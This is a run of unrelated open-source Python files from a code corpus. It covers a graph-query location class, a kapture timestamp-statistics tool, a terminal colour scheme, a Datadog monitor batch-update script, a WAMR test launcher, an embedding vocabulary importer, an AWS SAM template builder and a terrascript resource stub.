raise AssertionError("Already at a field, cannot nest fields: {}".format(self))
return FoldScopeLocation(self.base_location, self.fold_path, field=field)
def navigate_to_subpath(self, child: str) -> "FoldScopeLocation":
"""Return a new location after a traversal to the specified child location."""
if not isinstance(child, six.string_types):
raise TypeError("Expected child to be a string, was: {}".format(child))
if self.field:
raise AssertionError("Currently at a field, cannot go to child: {}".format(self))
edge_direction, edge_name = get_edge_direction_and_name(child)
new_fold_path = self.fold_path + _create_fold_path_component(edge_direction, edge_name)
return FoldScopeLocation(self.base_location, new_fold_path)
def __str__(self) -> str:
"""Return a human-readable str representation of the FoldScopeLocation object."""
return "FoldScopeLocation({}, {}, field={})".format(
self.base_location, self.fold_path, self.field
)
def __repr__(self) -> str:
"""Return a human-readable str representation of the FoldScopeLocation object."""
return self.__str__()
def __eq__(self, other: Any) -> bool:
"""Return True if the FoldScopeLocations are equal, and False otherwise."""
return (
type(self) == type(other)
and self.base_location == other.base_location
and self.fold_path == other.fold_path
and self.field == other.field
)
def __ne__(self, other: Any) -> bool:
"""Check another object for non-equality against this one."""
return not self.__eq__(other)
def __hash__(self) -> int:
"""Return the object's hash value."""
return hash(self.base_location) ^ hash(self.fold_path) ^ hash(self.field)
def _check_if_object_of_same_type_is_smaller(self, other: "FoldScopeLocation") -> bool:
"""Return True if the other object is smaller than self in the total ordering."""
if not isinstance(other, FoldScopeLocation):
raise AssertionError(
"Expected FoldScopeLocation type for other. Received {}: {}".format(
type(other).__name__, other
)
)
if self.base_location != other.base_location:
return self.base_location < other.base_location
if len(self.fold_path) != len(other.fold_path):
return len(self.fold_path) < len(other.fold_path)
if self.fold_path != other.fold_path:
return self.fold_path < other.fold_path
if self.field is None:
return other.field is not None
if other.field is None:
return False
return self.field < other.field
def _compare_location_and_fold_scope_location(
location: Location, fold_scope_location: FoldScopeLocation
) -> bool:
"""Return True if in our desired lexicographic ordering has location < fold_scope_location."""
# This helper makes it easier to implement the correct ordering logic while keeping mypy happy.
if location != fold_scope_location.base_location:
return location < fold_scope_location.base_location
return False
def get_vertex_path(location: BaseLocation) -> VertexPath:
"""Return a path leading to the vertex. The field component of the location is ignored."""
if isinstance(location, Location):
return location.query_path
elif isinstance(location, FoldScopeLocation):
return location.base_location.query_path + tuple(
f"{direction}_{edge_name}" for direction, edge_name in location.fold_path
)
else:
raise AssertionError(f"Unknown type {type(location)}: {location}")
|
tools/kapture_data_date_ranges.py | v-mehta/kapture | 264 | 11179830 |
#!/usr/bin/env python3
# Copyright 2020-present NAVER Corp. Under BSD 3-clause license
"""
Script to print statistics about kapture data.
"""
import argparse
import logging
import os
import os.path as path
import re
from datetime import datetime
import path_to_kapture # noqa: F401
import kapture
import kapture.utils.computation as computation
import kapture.utils.logging
import kapture.io.csv
logger = logging.getLogger('kapture_data_date')
KAPTURE_FILE_PARSING_RE = re.compile('.*(records|trajectories).*\\.txt')
def format_timestamp_range(first_timestamp: int, last_timestamp: int) -> str:
"""
Format a time range with unit.
:param first_timestamp: first timestamp
:param last_timestamp: last timestamp
:return string: formatted time range
"""
timestamp_len = 1
try:
timestamp_len = computation.num_digits(first_timestamp)
delta_len = 10 - timestamp_len # datetime expects epoch timestamp in seconds
factor = 10**delta_len
dts = [datetime.utcfromtimestamp(first_timestamp * factor),
datetime.utcfromtimestamp(last_timestamp * factor)]
timestamp_format_d = {
'date': '%Y/%m/%d',
'time': '%H:%M:%S.%f'
}
timestamp_parts = [
{
pname: dt.strftime(pformat)
for pname, pformat in timestamp_format_d.items()
}
for dt in dts
]
timestamp_str = timestamp_parts[0]['date'] + ' ' + timestamp_parts[0]['time']
timestamp_str += ' -> '
if timestamp_parts[0]['date'] != timestamp_parts[1]['date']:
timestamp_str = timestamp_parts[0]['date'] + ' '
timestamp_str += timestamp_parts[1]['time'] + ' GMT'
return timestamp_str
except ValueError as _: # noqa: F841
return f'{first_timestamp} -> {last_timestamp}' \
+ f' ** FAIL to parse as posix timestamp of {timestamp_len} digits'
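# Scaling sketch (illustrative values): a 13-digit millisecond timestamp such as
# 1577836800123 gives delta_len = 10 - 13 = -3, so factor = 10**-3 rescales it to
# 1577836800.123 seconds before datetime.utcfromtimestamp() is applied.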
def print_info(kapture_path: str, kapture_filename: str) -> None:
"""
Prints some info on given file that should contains records with timestamps
:param kapture_path: kapture top directory
:param kapture_filename: full path of a valid kapture file
"""
# Check version to test if this is a real kapture file
kapture_file_path = path.join(kapture_path, kapture_filename)
version = kapture.io.csv.get_version_from_csv_file(kapture_file_path)
if version is None:
logger.debug(f'{kapture_filename} not a kapture file')
else:
# Read the file
last_data_line = ''
nb_lines = 0
with open(kapture_file_path) as f:
# Count lines
for _ in f:
nb_lines += 1
# Reset to read some important lines
f.seek(0, os.SEEK_SET)
# Skip header
f.readline()
f.readline()
first_data_line = f.readline()
if first_data_line:
last_data_line = kapture.io.csv.get_last_line(f)
first_timestamp = 0
last_timestamp = 0
# data line are comma separated lines with the timestamp as first value
try:
if first_data_line:
first_timestamp = int(first_data_line.split(',')[0])
if last_data_line:
last_timestamp = int(last_data_line.split(',')[0])
except ValueError:
pass
if first_timestamp > 0 and last_timestamp > 0:
timestamp_range_str = format_timestamp_range(first_timestamp, last_timestamp)
timestamp_len1 = computation.num_digits(first_timestamp)
timestamp_len2 = computation.num_digits(last_timestamp)
timestamp_len_str = f'{timestamp_len1}' if timestamp_len1 == timestamp_len2\
else f'{timestamp_len1}-{timestamp_len2}'
print(f'{kapture_filename:42s} timestamp {timestamp_len_str} digits from {timestamp_range_str}'
f' : {(nb_lines-2):12,d} records'.replace(',', ' '))
def do_print(kapture_path: str) -> None:
"""
Print out kapture data:
:param kapture_path: full path to kapture directory.
"""
dirs_to_examine = set()
for k_path in kapture.io.csv.CSV_FILENAMES.values():
dirs_to_examine.add(path.dirname(k_path))
# Look for files which might contain kapture data
for k_dir in sorted(dirs_to_examine):
kapture_dir = path.join(kapture_path, k_dir)
if path.exists(kapture_dir):
if path.isdir(kapture_dir):
# print
logger.debug(f'browsing directory {k_dir}')
# Search for records or trajectory like files
kapture_files = []
for entry in os.listdir(kapture_dir):
if path.isfile(path.join(kapture_dir, entry)):
if KAPTURE_FILE_PARSING_RE.match(entry) is not None:
kapture_files.append(entry)
for kapture_file in sorted(kapture_files):
print_info(kapture_path, path.join(k_dir, kapture_file))
else:
logger.fatal(f'{kapture_dir} is not a directory')
else:
logger.debug(f'{kapture_dir} does not exist')
def print_command_line() -> None:
"""
Do the print using the parameters given on the command line.
"""
parser = argparse.ArgumentParser(description='Print statistics about kapture records files with timestamps.')
parser_verbosity = parser.add_mutually_exclusive_group()
parser_verbosity.add_argument(
'-v', '--verbose', nargs='?', default=logging.WARNING, const=logging.INFO,
action=kapture.utils.logging.VerbosityParser,
help='verbosity level (debug, info, warning, critical, ... or int value) [warning]')
parser_verbosity.add_argument(
'-q', '--silent', '--quiet', action='store_const', dest='verbose', const=logging.CRITICAL)
parser.add_argument('-k', '--kapture', required=True,
help='path to kapture data root directory.')
args = parser.parse_args()
logger.setLevel(args.verbose)
if args.verbose <= logging.DEBUG:
# also let kapture express its logs
kapture.utils.logging.getLogger().setLevel(args.verbose)
do_print(path.abspath(args.kapture))
if __name__ == '__main__':
print_command_line()
|
pymterm/colour/zenburn_2.py | stonewell/pymterm | 102 | 11179873 |
_color0 = '000d18'
_color8 = '000d18'
_color1 = 'e89393'
_color9 = 'e89393'
_color2 = '9ece9e'
_color10 = '9ece9e'
_color3 = 'f0dfaf'
_color11 = 'f0dfaf'
_color4 = '8cd0d3'
_color12 = '8cd0d3'
_color5 = 'c0bed1'
_color13 = 'c0bed1'
_color6 = 'dfaf8f'
_color14 = 'dfaf8f'
_color7 = 'efefef'
_color15 = 'efefef'
_colorBD = 'ffcfaf'
_colorUL = 'ccdc90'
_colorIT = '80d4aa'
_foreground = 'dcdccc'
_background = '1f1f1f'
_cursorColor = '8faf9f'
COLOR_PALLETE = [
_color0,
_color1,
_color2,
_color3,
_color4,
_color5,
_color6,
_color7,
_color8,
_color9,
_color10,
_color11,
_color12,
_color13,
_color14,
_color15,
]
def parse_color(c):
r = int(c[:2], 16)
g = int(c[2:4], 16)
b = int(c[4:6], 16)
return [r, g, b, 0xFF]
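# e.g. parse_color('1f1f1f') -> [31, 31, 31, 255] (the _background colour above).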
def apply_color(cfg, color_table):
cfg.default_foreground_color = parse_color(_foreground)
cfg.default_background_color = parse_color(_background)
cfg.default_cursor_color = parse_color(_cursorColor)
for i in range(len(COLOR_PALLETE)):
if i < len(color_table):
color_table[i] = parse_color(COLOR_PALLETE[i])
return True
|
batchMonitorUpdate/batchUpdateReturnAll.py | Manny27nyc/Miscellany | 155 | 11179879 | from datadog import initialize, api
options = {
    'api_key': '<your-api-key>',
'app_key': '<your-app-key>'
}
# Script that allows for updating batches of monitors programmatically.
initialize(**options)
if __name__=="__main__":
monitorList = api.Monitor.get_all() # Returns a list of dictionaries containing monitor details.
for monitor in monitorList: # Iterate over all returned monitors
# Keys present in monitor dictionary
# dict_keys(['restricted_roles', 'tags', 'deleted', 'query', 'message', 'matching_downtimes', 'id', 'multi', 'name', 'created', 'created_at', 'creator', 'org_id', 'modified', 'priority', 'overall_state_modified', 'overall_state', 'type', 'options'])
# Monitor API https://docs.datadoghq.com/api/latest/monitors/
# Example to change an email present in the notification section
        message = monitor.get('message') or ''  # 'message' may be None on some monitors
        if 'datadoghq.com' in message:
            api.Monitor.update(monitor.get('id'), message=message.replace('datadoghq.com', 'doge.com')) |
test-tools/component_test/start.py | BernardXiong/wasm-micro-runtime | 1,723 | 11179898 |
#
# Copyright (C) 2019 Intel Corporation. All rights reserved.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
It is the entrance of the iagent test framework.
"""
import argparse
import datetime
import os
import pprint
import random
import re
import shlex
import subprocess
import signal
import sys
import time
sys.path.append('../../../app-sdk/python')
from framework.test_utils import *
from framework.framework import *
def signal_handler(signal, frame):
print('Pressed Ctrl+C!')
sys.exit(0)
def Register_signal_handler():
signal.signal(signal.SIGINT, signal_handler)
# signal.pause()
def flatten_args_list(l):
if l is None:
return None
return [x for y in l for x in y]
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = "to run specific case(s) "\
"in specific suite(s) with FC test framework")
parser.add_argument('-s', dest = 'suite_id', action = 'append',
nargs = '+',
help = 'one or multiple suite ids, which are also setup ids.'\
'by default if it isn\'t passed from argument, all '\
'suites are going to be run.')
parser.add_argument('-t', dest = 'case_id', action = 'append',
nargs = '+',
help = 'one or multiple cases ids.'\
'by default if it isn\'t passed from argument, all '\
'cases in specific suites are going to be run.')
parser.add_argument('-n', dest = 'repeat_time', action = 'store',
default = 1,
help = 'how many times do you want to run. there is 40s '\
'break time between two rounds. each round includs '\
'init_setup, run_test_case and deinit_setup.')
parser.add_argument('--shuffle_all', dest = 'shuffle_all',
default = False, action = 'store_true',
help = 'shuffle_all test cases in per test suite '\
'by default, all cases under per suite should '\
'be executed by input order.')
parser.add_argument('--cases_list', dest='cases_list_file_path',
default=None,
action='store',
help="read cases list from a flie ")
parser.add_argument('--skip_proc', dest='skip_proc',
default = False, action = 'store_true',
help='do not start the test process.'\
'sometimes the gw_broker process will be started in eclipse for debug purpose')
parser.add_argument('-b', dest = 'binaries', action = 'store',
help = 'The path of target folder ')
parser.add_argument('-d', dest = 'debug', action = 'store_true',
help = 'wait user to attach the target process after launch processes ')
parser.add_argument('--rebuild', dest = 'rebuild', action = 'store_true',
help = 'rebuild all test binaries')
args = parser.parse_args()
print "------------------------------------------------------------"
print "parsing arguments ... ..."
print args
'''
logger = logging.getLogger('coapthon.server.coap')
logger.setLevel(logging.DEBUG)
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
logger.addHandler(console)
'''
print "------------------------------------------------------------"
print "preparing wamr binary and test tools ... ..."
os.system("cd ../../samples/simple/ && bash build.sh -p host-interp")
Register_signal_handler()
api_init_globals();
api_create_case_event();
suites_list = flatten_args_list(args.suite_id)
cases_list = flatten_args_list(args.case_id)
dirname, filename = os.path.split(os.path.abspath(sys.argv[0]))
api_set_root_path(dirname);
framework = CTestFramework(dirname);
framework.repeat_time = int(args.repeat_time)
framework.shuffle_all = args.shuffle_all
framework.skip_proc=args.skip_proc
api_set_value('keep_env', args.skip_proc)
api_set_value('debug', args.debug)
api_set_value('rebuild', args.rebuild)
binary_path = args.binaries
if binary_path is None:
binary_path = os.path.abspath(dirname + '/../..')
print "checking execution binary path: " + binary_path
if not os.path.exists(binary_path):
print "The execution binary path was not available. quit..."
os._exit(0)
api_set_value('binary_path', binary_path)
if suites_list is not None:
framework.target_suites = suites_list
else:
framework.load_suites()
framework.target_cases = cases_list
framework.start_run()
print "\n\n------------------------------------------------------------"
print "The run folder is [" + framework.running_folder +"]"
print "that's all. bye"
print "kill to quit.."
t_kill_process_by_name("start.py")
    sys.exit(0)
|
seq2seq-chatbot/vocabulary_importers/flatfile_vocabulary_importer.py | rohitkujur1997/chatbot | 104 | 11179921 | """
Base class for Flat File vocabulary importers
"""
import numpy as np
from collections import OrderedDict
from os import path
from vocabulary_importers.vocabulary_importer import VocabularyImporter
class FlatFileVocabularyImporter(VocabularyImporter):
"""Base class for Flat File vocabulary importers
"""
def __init__(self, vocabulary_name, tokens_and_embeddings_filename, delimiter):
        """Initialize the FlatFileVocabularyImporter.
        Args:
            vocabulary_name: See base class
            tokens_and_embeddings_filename: Name of the file containing the token/word list and embeddings.
                Format should be one line per word where the word is at the beginning of the line and the embedding vector follows
                separated by a delimiter.
            delimiter: Character that separates the word and the values of the embedding vector.
        """
        super(FlatFileVocabularyImporter, self).__init__(vocabulary_name)
self.tokens_and_embeddings_filename = tokens_and_embeddings_filename
self.delimiter = delimiter
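    # Expected file layout (illustrative GloVe-style rows, space-delimited):
    #   the 0.418 0.24968 -0.41242 ...
    #   of 0.70853 0.57088 -0.46720 ...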
def _read_vocabulary_and_embeddings(self, vocabulary_dir):
"""Read the raw vocabulary file(s) and return the tokens list with corresponding word vectors
Args:
vocabulary_dir: See base class
"""
tokens_and_embeddings_filepath = path.join(vocabulary_dir, self.tokens_and_embeddings_filename)
tokens_with_embeddings = OrderedDict()
with open(tokens_and_embeddings_filepath, encoding="utf-8") as file:
            for line in file:
values = line.split(self.delimiter)
token = values[0].strip()
if token != "":
token = self._process_token(token)
tokens_with_embeddings[token] = np.array(values[1:], dtype=np.float32)
return tokens_with_embeddings |
samcli/lib/bootstrap/stack_builder.py | aubelsb2/aws-sam-cli | 2,959 | 11179931 |
"""
Abstract definitions for stack builder
"""
import json
from abc import ABC
from copy import deepcopy
from typing import Dict, Union, cast
from samcli import __version__ as VERSION
METADATA_FIELD = "Metadata"
RESOURCES_FIELD = "Resources"
OUTPUTS_FIELD = "Outputs"
DEFAULT_TEMPLATE_BEGINNER = {
"AWSTemplateFormatVersion": "2010-09-09",
"Transform": "AWS::Serverless-2016-10-31",
METADATA_FIELD: {"SamCliInfo": VERSION},
RESOURCES_FIELD: {},
OUTPUTS_FIELD: {},
}
class AbstractStackBuilder(ABC):
"""
AbstractStackBuilder implementation which holds common methods for adding resources/properties
and generating SAM template
"""
_template_dict: Dict
def __init__(self, description: str):
self._template_dict = deepcopy(DEFAULT_TEMPLATE_BEGINNER)
self._template_dict["Description"] = description
def add_metadata(self, key: str, value: Union[str, Dict]) -> None:
if METADATA_FIELD not in self._template_dict:
self._template_dict[METADATA_FIELD] = {}
metadata = cast(Dict, self._template_dict.get(METADATA_FIELD))
metadata["key"] = value
def add_resource(self, resource_name: str, resource_dict: Dict) -> None:
if RESOURCES_FIELD not in self._template_dict:
self._template_dict[RESOURCES_FIELD] = {}
resources = cast(Dict, self._template_dict.get(RESOURCES_FIELD))
resources[resource_name] = resource_dict
def add_output(self, output_name: str, output_value: Union[Dict, str]) -> None:
if OUTPUTS_FIELD not in self._template_dict:
self._template_dict[OUTPUTS_FIELD] = {}
outputs = cast(Dict, self._template_dict.get(OUTPUTS_FIELD))
outputs[output_name] = {"Value": output_value}
def build_as_dict(self) -> Dict:
return deepcopy(self._template_dict)
def build(self) -> str:
return json.dumps(self._template_dict, indent=2)
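# Minimal usage sketch (hypothetical subclass name; the base class declares no
# abstract methods, so a bare subclass is enough to build a template):
#
#   class ManagedStackBuilder(AbstractStackBuilder):
#       pass
#
#   builder = ManagedStackBuilder("SAM CLI managed resources")
#   builder.add_resource("SamCliSourceBucket", {"Type": "AWS::S3::Bucket"})
#   builder.add_output("SourceBucket", {"Ref": "SamCliSourceBucket"})
#   print(builder.build())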
|
terrascript/resource/hashicorp/kubernetes_alpha.py | mjuenema/python-terrascript | 507 | 11179943 | # terrascript/resource/hashicorp/kubernetes_alpha.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:20:48 UTC)
import terrascript
class kubernetes_manifest(terrascript.Resource):
pass
__all__ = [
"kubernetes_manifest",
]
|